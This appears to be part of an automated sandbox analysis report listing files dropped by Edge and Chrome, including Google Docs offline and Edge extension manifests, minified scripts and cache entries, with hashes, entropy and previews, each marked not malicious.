                                                                                                                                                                                                                                                                                          SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                          MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                          SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                          SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                          SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2525
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                          MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                          SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                          SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                          SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                          MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                          SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                          SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                          SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):122218
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                          MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                          SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                          SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                          SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):291
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                          MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                          SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                          SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                          SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):130866
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                          MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                          SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                          SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                          SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_683093463\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1753
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                          MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                          SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                          SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                          SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_683093463\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9815
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                          MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                          SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                          SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                          SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_683093463\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10388
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                          MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                          SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                          SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                          SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_683093463\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):962
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                          MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                          SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                          SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                          SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_683093463\eef5a1c8-cd0e-4a18-8f41-1d812bd2253f.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 453

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (836)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):841
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.180365365053369
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:VB7WsaBEhBHslgT9lCuABAT4T4uoB7HHHHHHHYqmffffffo:VVNaCKlgZ01BAMT4uSEqmffffffo
                                                                                                                                                                                                                                                                                          MD5:0D6C1D199FADFF2172B235A2250389CE
                                                                                                                                                                                                                                                                                          SHA1:2344E61C38D6597F40DE152CBDFEFC008EBF2B36
                                                                                                                                                                                                                                                                                          SHA-256:D5F7B9EF39AC0C86038D6D32695086EB5F1F774B58E938BBAABFB29C22C82FB5
                                                                                                                                                                                                                                                                                          SHA-512:E108AD59763CCDC4E95E5779CD1AF13B763990509D9A676A73B9289A9829CB1651AAF4B1A8F1A8860FEBED6390730F6CE737116A5CD22021EAFACA69D1F7C966
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                          Preview:)]}'.["",["aries daily horoscope today","helldivers killzone crossover","penn state nebraska volleyball game","soundhound ai stock","western washington power outages","auburn johni broome injury","anora streaming date","honda nissan merger talks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-6601595147070906387,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 454

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.9837880587523955
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:O0NBGsn:O0NBx
                                                                                                                                                                                                                                                                                          MD5:8A6CE39DB421A86CB2DF95F014512E5A
                                                                                                                                                                                                                                                                                          SHA1:CD7B2080B48D555199735D0B9988C8AD4941A534
                                                                                                                                                                                                                                                                                          SHA-256:8B8A7AEA5C77277DFE1FF4D5CCBB4010933C7289DD9B48D856C4E234F3021662
                                                                                                                                                                                                                                                                                          SHA-512:430C500BA71E511052422162751B7E678ADB82CC3484389D7A6BEC24490BAFDA0106EE057C4F552F5F511310C2E8F4924D278DC49815370EED0A4764B2BEB4D6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                          Preview:.....jr..I.4...e)..R..9..c...F.

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 455

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):132732
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.436726191054436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:fEkJQ7O4N5dTm+syHEt4W3XdQ4Q6HuSr/nUW2i6o:fBQ7HTt/sHdQ4Q6HDfUW8o
                                                                                                                                                                                                                                                                                          MD5:B75613F7A68C3B12372A04C4CFC04949
                                                                                                                                                                                                                                                                                          SHA1:9FDCF8FF3578735B7162F97422115F8D361629A1
                                                                                                                                                                                                                                                                                          SHA-256:830DE5C10CDDD15DF362ED4D96251366FD711FC20D2E87A858089DF992821D87
                                                                                                                                                                                                                                                                                          SHA-512:16BE44214F2AD6B8FC2D18F74AFF3F63397FB97DA0E158560DADA019DDBF6A977C393A571BEB4C50A1D1464042F61EA9934BF96BB4C40D6E8520E74CFC716282
                                                                                                                                                                                                                                                                                          Malicious:false
